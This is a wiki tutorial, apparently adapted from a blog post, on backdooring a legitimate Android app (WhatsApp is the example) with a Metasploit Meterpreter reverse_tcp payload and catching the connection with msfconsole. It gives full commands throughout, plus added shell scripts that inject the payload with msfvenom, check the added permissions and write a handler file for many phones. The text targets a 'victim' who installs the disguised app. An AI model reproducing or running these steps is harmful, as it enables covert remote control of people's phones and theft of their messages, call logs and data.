Difference between revisions of "MSF: Embed MSF exploit into original apk"

From OnnoWiki
(15 intermediate revisions by the same user not shown)
  

Latest revision as of 13:26, 1 June 2017

Source: https://techkernel.org/2015/12/11/embed-metasploit-payload-in-apk-easily/


WARNING: The apk-payload-injector script no longer appears to work; use msfvenom instead (msfvenom takes the original APK as a template with -x and performs the same injection).


One problem with attacks on Android is making the payload we generate with Meterpreter in Metasploit look like a legitimate application that the victim will actually install. A bare Meterpreter APK is a few kilobytes, shows nothing when opened, and gets uninstalled right away, if it is installed at all. To get around that we embed the Metasploit-generated payload into a legitimate application, so the result looks and behaves like the original app while the payload runs alongside it.

PREREQUISITES

  • Prepare a laptop / VM with Kali Linux.
  • Tool used: apktool (packaged in Kali).
  • Install (the echo line is only needed if the kali-rolling repository is not already in /etc/apt/sources.list; appending it twice only produces apt warnings):
echo "deb http://http.kali.org/kali kali-rolling main contrib non-free" >> /etc/apt/sources.list
apt-get update
apt-get install apktool lib32stdc++6 lib32ncurses5 lib32z1
  The lib32 packages are the ones the original techkernel.org post lists (its apktool build needed a 32-bit aapt on 64-bit Kali); "libz1" is not a Debian package name. If a lib32 package name has moved on in your Kali, install whatever lib32 ncurses/zlib package apt currently offers.
  • Prepare a debug key (the script signs the rebuilt APK with the standard Android debug keystore: alias androiddebugkey, password android; keytool and jarsigner both come with the JDK):
mkdir -p ~/.android
keytool -genkey -v -keystore ~/.android/debug.keystore -alias androiddebugkey -storepass android -keypass android -keyalg RSA -keysize 2048 -validity 10000 -dname "CN=Android Debug,O=Android,C=US"
  Caveat: the rebuilt APK is signed with this key, not the vendor's, so Android refuses to install it over an existing installation of the genuine app (signature mismatch); the victim has to uninstall the real app first. A debug-key signature is also an easy fingerprint for anyone checking the APK.

STEP 1:

  • Find the original apk.
  • Google for "app_name apk download", e.g. "whatsapp apk download".

For the WhatsApp apk

  • Go to
http://www.androidapksfree.com/apk/whatsapp-apk-latest-version-download/
http://pollux.androidapksfree.com/polluxdata/6cc0605e4a0f974c583e1d506a5f538e/com.whatsapp_v2.17.200-451830_Android-4.0.apk
  • The file is
com.whatsapp_v2.17.200-451830_Android-4.0.apk
  • Third-party mirrors may serve an APK that was already modified by someone else. Check that the signer is the vendor's before using it as a template, e.g. jarsigner -verify -verbose -certs com.whatsapp_v2.17.200-451830_Android-4.0.apk (or apksigner verify --print-certs from the Android SDK build-tools).


STEP 2:

Download the Ruby script from

https://github.com/SkullTech/apk-payload-injector

or from the CLI

wget https://github.com/SkullTech/apk-payload-injector/archive/master.zip
unzip master.zip

(Credit for apk-embed-payload.rb goes to timwr and Jack64, as the original techkernel.org post notes.)

Put the apk and the Ruby script in the same folder

mv com.whatsapp_v2.17.200-451830_Android-4.0.apk apk-payload-injector-master/

STEP 3:

On the Kali Linux CLI, check Kali's IP address (e.g. 192.168.0.104)

ifconfig -a

(ip -4 addr shows the same on newer Kali.) This is the LHOST the payload connects back to. If the phone is not on the same LAN, LHOST must be an address the phone can reach, i.e. your public IP with LPORT forwarded to the Kali box, as the original techkernel.org post notes; LPORT can be any free port.

On the Kali Linux CLI, embed meterpreter into the apk

cd apk-payload-injector-master/
ruby apk-embed-payload.rb com.whatsapp_v2.17.200-451830_Android-4.0.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4895


The output looks roughly like this:

[*] Generating msfvenom payload..
[*] Signing payload..
[*] Decompiling orignal APK..
[*] Decompiling payload APK..
[*] Locating onCreate() hook..
[*] Copying payload files..
[*] Loading original/smali/com/whatsapp/Main.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding android.permission.CALL_PHONE
[*] Adding android.permission.READ_SMS
[*] Adding android.permission.SET_WALLPAPER
[*] Adding android.permission.READ_CALL_LOG
[*] Adding android.permission.WRITE_CALL_LOG
[*] Rebuilding com.whatsapp_v2.17.200-451830_Android-4.0.apk with meterpreter injection as com_backdoored.apk..
[*] Signing com_backdoored.apk ..
[+] Infected file com_backdoored.apk ready.

What the script does, line by line: it generates a plain android/meterpreter/reverse_tcp APK with msfvenom, decompiles both APKs with apktool, copies the payload's smali into the original, hooks the launcher Activity's onCreate() (here original/smali/com/whatsapp/Main.smali) so the payload starts every time the app is opened, merges the permissions Meterpreter needs into AndroidManifest.xml, then rebuilds and signs the result. The merged permissions are the most visible change: the backdoored app asks for things the original never did (READ_SMS, CALL_PHONE, call logs), which is what a suspicious user or a scanner will notice.

The file name

com_backdoored.apk

If you are unlucky, the payload-injector cannot work out which Activity it has to bind to. In that case open the folder

original

(the decompiled copy of the APK that the script leaves behind) and do the following:

  • Open / edit AndroidManifest.xml
  • Find the <activity> tag whose intent-filter contains both '.MAIN' (android.intent.action.MAIN) and '.LAUNCHER' (android.intent.category.LAUNCHER).
  • Read that tag's 'android:name' attribute and note the Activity name. A name starting with "." is relative to the manifest's package attribute (".Main" in package com.whatsapp is com.whatsapp.Main).
  • Run the process again; when the Ruby script asks for the Activity, enter the number corresponding to the Activity name you noted and press ENTER.
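The manual lookup above can be scripted. The function below, an added example that is not part of the original page or the injector script, finds the launcher Activity in a decoded AndroidManifest.xml and resolves a relative name against the package attribute, which is exactly the value the injector asks you for. It needs only POSIX awk; the manifest path is whatever apktool or the script wrote (original/AndroidManifest.xml in the layout above).

```shell
#!/bin/sh
# Added example (not from the original page): locate the launcher Activity that the
# injector hooks, from a decoded AndroidManifest.xml, instead of reading the file by eye.
# Needs only POSIX awk.

# Print the fully qualified name of the first <activity> whose intent-filter declares
# both android.intent.action.MAIN and android.intent.category.LAUNCHER. A name that
# starts with "." is resolved against the manifest's package attribute.
# Limitation: a self-closing <activity .../> must end on the line it starts on, as
# apktool writes it; <activity-alias> launchers are not considered.
launcher_activity() {
    awk '
        /<manifest/ && match($0, /package="[^"]*"/) {
            pkg = substr($0, RSTART + 9, RLENGTH - 10)
        }
        /<activity[ >]/ {
            if ($0 ~ /\/>[ \t]*$/) next      # no intent-filter, cannot be the launcher
            inact = 1; block = ""
        }
        inact { block = block "\n" $0 }
        /<\/activity>/ && inact {
            inact = 0
            if (block ~ /\.MAIN"/ && block ~ /\.LAUNCHER"/ &&
                match(block, /android:name="[^"]*"/)) {
                # the first android:name in the block belongs to the <activity> tag
                # itself; the intent-filter children only come after it
                name = substr(block, RSTART + 14, RLENGTH - 15)
                if (name ~ /^\./) name = pkg name
                print name
                exit
            }
        }
    ' "$1"
}

# usage: sh launcher.sh original/AndroidManifest.xml
if [ "$#" -eq 1 ]; then
    launcher_activity "$1"
fi
```

Run it on the decoded manifest and compare the printed name with the numbered list the Ruby script shows at its prompt; an empty result means the app's launcher is declared some other way (for instance through an activity-alias) and has to be read by hand.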

PROFIT?!:

On the Kali Linux CLI, type

msfconsole

then

use multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.0.104
set LPORT 4895
exploit

PAYLOAD, LHOST and LPORT must match what was baked into the APK in STEP 3. For the handler, LHOST is the address to listen on, so 0.0.0.0 also works when the phone reaches you through NAT on a forwarded port.

Wait until the victim's Android phone connects back; when the app is opened you get a Meterpreter session in the terminal.
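Following the WARNING at the top, here is STEP 3 and the listener setup done with msfvenom instead of the Ruby script, plus the two checks a practitioner wants before handing the APK to anyone: which permissions the injection added to the manifest (the visible change discussed in STEP 3) and whether the rebuilt file carries a valid signature. It also writes a msfconsole resource file from the same LHOST/LPORT, so the handler from the PROFIT step cannot disagree with the payload. This is an added example, not code from the original page or from the injector's authors; it assumes msfvenom, apktool and jarsigner are on PATH, and the manifests in the test are constructed.

```shell
#!/bin/sh
# Added example (not from the original page): inject android/meterpreter/reverse_tcp
# into an existing APK with msfvenom (-x uses the original APK as the template, which
# is what the WARNING at the top recommends over the Ruby script), then check what
# the injection changed. Assumes msfvenom, apktool and jarsigner are on PATH.

# Build the backdoored copy of the template APK $1 and write it to $4.
inject_with_msfvenom() {
    orig="$1"; lhost="$2"; lport="$3"; out="$4"
    msfvenom -x "$orig" -p android/meterpreter/reverse_tcp \
        "LHOST=$lhost" "LPORT=$lport" -o "$out"
}

# Decode only resources and manifest (-s skips smali) and print the manifest path.
decode_manifest() {
    apk="$1"; dir="$2"
    apktool d -s -f "$apk" -o "$dir" >/dev/null
    echo "$dir/AndroidManifest.xml"
}

# Sorted, unique list of <uses-permission> names declared in a decoded manifest.
list_permissions() {
    grep 'uses-permission' "$1" \
        | grep -o 'android:name="android\.permission\.[A-Z_]*"' \
        | sed 's/.*="\(.*\)"/\1/' \
        | sort -u
}

# Permissions present in manifest $2 but not in manifest $1: these are what the
# injected Meterpreter asked for and what the victim's install prompt will show.
added_permissions() {
    before=$(mktemp); after=$(mktemp)
    list_permissions "$1" > "$before"
    list_permissions "$2" > "$after"
    comm -13 "$before" "$after"
    rm -f "$before" "$after"
}

# Write a msfconsole resource file whose handler matches the injected payload exactly.
# ExitOnSession false + exploit -j keeps the handler up for more than one phone.
write_handler_rc() {
    lhost="$1"; lport="$2"; rc="$3"
    cat > "$rc" <<EOF
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT $lport
set ExitOnSession false
exploit -j
EOF
}

main() {
    orig="$1"; lhost="$2"; lport="$3"
    out="${orig%.apk}_backdoored.apk"
    inject_with_msfvenom "$orig" "$lhost" "$lport" "$out"
    before=$(decode_manifest "$orig" "$(mktemp -d)")
    after=$(decode_manifest "$out" "$(mktemp -d)")
    echo "permissions added by the injection:"
    added_permissions "$before" "$after"
    # An APK without a valid signature will not install at all.
    jarsigner -verify "$out"
    write_handler_rc "$lhost" "$lport" handler.rc
    echo "start the listener with: msfconsole -q -r handler.rc"
}

# usage: sh inject_check.sh original.apk 192.168.0.104 4895
if [ "$#" -eq 3 ]; then
    main "$@"
fi
```

The permission diff is the check worth keeping even if you stay with the Ruby script: run added_permissions against the script's original/ directory and a decode of com_backdoored.apk and you get the same list the script printed under "Poisoning the manifest", read back from the artefact rather than trusted from the log.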
